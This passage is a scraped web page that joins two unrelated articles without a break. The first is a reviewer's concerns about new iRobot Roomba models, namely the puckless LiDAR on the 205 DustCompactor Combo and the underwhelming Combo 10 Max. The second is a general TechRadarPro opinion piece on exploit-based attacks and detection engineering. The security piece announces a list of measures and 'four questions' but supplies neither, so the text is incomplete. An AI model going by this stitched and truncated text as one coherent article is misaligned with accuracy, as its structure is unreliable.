2 innovations I'm worried about… #1. Bots with no raised puckThe LiDAR here is called 'ClearView' and appears across all models. Interestingly, iRobot has removed the raised puck on the 205 DustCompactor Combo, to give a more streamlined design. This model uses the same LiDAR technology, but it's shifted into the front of the robot. The issue is, the puck is there for a purpose; to enable the bot to 'see' all around, and navigate accurately. Shifting the LiDAR tech into the front of the robovac means a far narrower field of view.
(Image credit: iRobot)Other brands are also experimenting with removing the puck, but all those I've come across have introduced new technology to compensate for that more limited field of view. For instance, the Dreame X50 Ultra Complete and Roborock Saros 10 (reviews incoming) have a puck that can retract into the body of the robot when it approaches an area of limited height, but will pop back up when space allows.
The Roborock Qrevo Slim and Saros 10R do away with a puck entirely, but for this the brand has engineered a whole new navigation method entirely, called StarSight, to ensure navigation isn't compromised. I'm no engineer, but surely they wouldn't be going to all that trouble if you could just chop the puck off with no impact.
The iRobot spokesperson I chatted with assured me there would be no compromise in navigation accuracy – they told me they were testing two bots, one with the puck and one without, and they were both behaving the same way. I'll be really interested to test this out and see for myself.
#2. The continued presence of the Combo 10 MaxMy other slight misgiving is that the current 'Max' segment consists only of the Combo 10 Max. It only launched in July 2024, so perhaps iRobot felt it was too soon to scrap it. However, as what should be the shining star of the Roomba fleet, it's underwhelming.
It was generally not well received – we awarded it a less-than-ideal 3 stars in our Roomba Combo 10 Max review, with our tester complaining of painfully slow mapping (no LiDAR here) and sub-standard mop cleaning. Both of these aspects have been improved on in the new Plus models, which look far more promising to me.
Overall, though, it's promising news from iRobot, and I appreciate that the brand has been bold enough to accept that what it was doing wasn't working, and go for a big reboot. I'm excited to get these new models into my flat and test the new features out for myself.
You might also like...In today's rapidly evolving threat landscape, cybersecurity is more crucial than ever. Advanced persistent threats (APTs) and sophisticated attacker tactics are now part of the norm. Modern attackers are faster and more creative, taking mere hours to move from initial compromise to reaching their objectives.
Yet, detecting an attacker often takes days—sometimes even months. This speed disparity highlights the urgent need for a more robust and intelligent approach to cyber defense.
The Rise of Exploit-Based AttacksOne of the biggest challenges facing security teams is the shift towards exploit-based attacks. These attacks leverage vulnerabilities in software and systems, often taking advantage of zero-day exploits or previously unknown weaknesses. Unlike traditional malware attacks, exploit-based attacks are much harder to identify.
Recent studies highlight that vulnerabilities, not just phishing, have become a primary attack vector. Mandiant reports that exploit-based attacks have overtaken email-based methods, and CrowdStrike notes that 75% of threats now leverage “living off the land” (LotL) tools rather than traditional malware. These methods exploit vulnerabilities in existing systems and applications, often taking advantage of overlooked entry points. The growing prevalence of zero-days and AI-powered exploit discovery further complicates the challenge for defenders.
The Critical Role of DetectionTo address these challenges, organizations need to adopt a new approach to security. Effective detection is essential, especially with the increasing number of malware-less attacks. According to Accenture, less than 1% of an organization’s detection rules are fully effective. Many detection rules remain outdated, resulting in a flood of false positives and missed detection opportunities.
Detection must focus on adversary behaviors, not static indicators like malware hashes. The shelf life for these ephemeral indicators is short. Behavior-based detection tied to adversary tactics, techniques, and procedures (TTPs) gives organizations a chance to detect and mitigate threats in real time, meeting compliance requirements from regulations like GDPR, PCI, HIPAA, and FISMA.
Why Improving Detection is ChallengingDetection engineering is the discipline of transforming adversary knowledge into actionable detection rules. This is a continuous cycle: researching relevant threats, building specific detection logic, and validating those detections to ensure effectiveness. But many organizations struggle here. Writing, testing, and maintaining hundreds of detection rules can overwhelm even the most mature security teams. Tests can be written poorly, and when they aren’t validated accurately, they lead to gaps in coverage or false positives that bury real alerts.
Effective detection is not just about having the right rules in place. It's also about having the right processes and technologies to support those rules. This includes:
Organizations looking to enhance their detection capabilities should consider these four questions:
By implementing these measures, organizations can significantly improve their ability to detect and respond to cyberattacks. However, it's important to remember that security is an ongoing process, not a one-time event. Attackers are constantly evolving their methods, so security teams must continuously adapt their defenses to stay ahead of the curve.
In addition to the technical measures outlined above, organizations also need to focus on building a strong security culture. This means educating employees about cybersecurity risks and best practices, and empowering them to report suspicious activity. A strong security culture can help to prevent attacks in the first place, and it can also help to ensure that incidents are identified and responded to quickly.
We've made a list of the best network monitoring tools.
This article was produced as part of TechRadarPro's Expert Insights channel where we feature the best and brightest minds in the technology industry today. The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/news/submit-your-story-to-techradar-pro